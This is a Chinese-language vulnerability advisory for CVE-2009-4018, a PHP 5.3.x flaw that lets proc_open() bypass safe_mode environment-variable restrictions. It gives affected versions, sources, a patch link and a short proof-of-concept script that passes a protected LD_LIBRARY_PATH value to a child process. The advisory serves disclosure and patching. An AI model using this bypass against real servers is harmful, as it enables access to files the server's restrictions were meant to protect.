PHP proc_open()绕过safe_mode_protected_env_var限制漏洞
发布日期:2009-11-20
更新日期:2009-11-30
受影响系统:PHP PHP 5.3.x
不受影响系统:PHP PHP 5.3.1
描述:
BUGTRAQ ID:
37138
CVE(CAN) ID:
CVE-2009-4018
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP没有执行任何检查便允许传送对proc_open所指定的环境变量,这就忽略了safe_mode_allowed_env_vars和safe_mode_protected_env_vars设置。用户可以绕过safe_mode限制访问Apache UID可访问的任意文件。
<*来源:Joe Orton
链接:
http://marc.info/?l=oss-security&m=125897935330618&w=2
http://bugs.php.net/bug.php?id=49026
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?
putenv("BLAHBLAH=123");
putenv("LD_LIBRARY_PATH=/no/way");
putenv("PHP_TESTVAR=allowed");
$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way',
'PHP_TESTVAR' => 'allowed');
$dptspec = array(0 => array("pipe", "r"),
1 => array("pipe", "w"));
$fp = proc_open('env', $dptspec, $pipes, './', $env);
echo "<pre>";
while(!feof($pipes[1])) echo fgets($pipes[1], 1024);
fclose($pipes[1]);
echo "</pre>";
?>
建议:
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.php.net/viewvc/?view=revision&revision=286360浏览次数:2906
严重程度:0(网友投票)